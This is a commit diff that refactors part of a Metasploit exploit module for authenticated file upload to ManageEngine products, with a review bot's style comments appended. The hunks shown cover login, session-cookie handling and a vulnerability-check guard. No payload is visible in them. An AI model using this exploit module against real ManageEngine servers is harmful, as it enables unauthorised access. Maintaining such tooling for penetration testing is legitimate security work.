
Commit ed26a2f

committed
Avoid modify datastore options
1 parent 3c0efe4 commit ed26a2f


1 file changed

+16
-13
lines changed


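--- a/modules/exploits/multi/http/manageengine_auth_upload.rb
+++ b/modules/exploits/multi/http/manageengine_auth_upload.rb
@@ -163,29 +163,25 @@ def authenticate_it360(port, path, username, password)
 }
 else
 vars_post = {
-'LOGIN_ID' => username,
-'PASSWORD' => password,
-'isADEnabled' => 'true',
-'domainName' => datastore['DOMAIN_NAME']
+'LOGIN_ID' => username,
+'PASSWORD' => password,
+'isADEnabled' => 'true',
+'domainName' => datastore['DOMAIN_NAME']
 }
 end
 
-sd_port = datastore['RPORT']
-datastore['RPORT'] = port
-
 res = send_request_cgi({
+'rport' => port,
 'method' => 'POST',
-'uri' => normalize_uri(path),
+'uri' => normalize_uri(path),
 'vars_get' => {
-'service' => 'ServiceDesk',
-'furl' => '/',
+'service' => 'ServiceDesk',
+'furl' => '/',
 'timestamp' => Time.now.to_i
 },
 'vars_post' => vars_post
 })
 
-datastore['RPORT'] = sd_port
-
 if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/
 # /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed"
 return res.get_cookies
@@ -211,7 +207,7 @@ def get_it360_cookie_name
 
 def login_it360
 # Do we already have a valid cookie? If yes, just return that.
-if datastore['IAMAGENTTICKET'] != nil
+if datastore['IAMAGENTTICKET']
 cookie_name = get_it360_cookie_name
 cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'
 return cookie
@@ -230,6 +226,7 @@ def login_it360
 end
 
 cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])
+
 if cookie != nil
 return cookie
 elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
@@ -371,6 +368,11 @@ def pick_target
 
 
 def exploit
+if check == Exploit::CheckCode::Safe
+fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable")
+end
+
+print_status("#{peer} - Selecting target...")
 @my_target = pick_target
 print_status("#{peer} - Selected target #{@my_target.name}")
 
@@ -379,6 +381,7 @@ def exploit
 else
 cookie = login
 end
+
 if cookie == nil
 fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to authenticate")
 end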
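Review bot: The guard added at the top of `exploit` writes the failure constant as `Failure::NotVulnerable`, while the unchanged call in the last hunk of the same method still reads `Exploit::Failure::Unknown`; use one spelling, e.g. `fail_with(Failure::Unknown, "#{peer} - Failed to authenticate")`. The same pass could finish the nil clean-up the commit starts in `login_it360`: `if cookie != nil` and `if cookie == nil` remain in the touched hunks and read better as `if cookie` and `if cookie.nil?`. The guard also stops only on `CheckCode::Safe`, so any other result from `check` (not visible here) proceeds; a one-line comment such as `# Only a definite Safe result aborts; other check codes continue` would make that intent explicit. The body of `exploit` continues outside these hunks.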
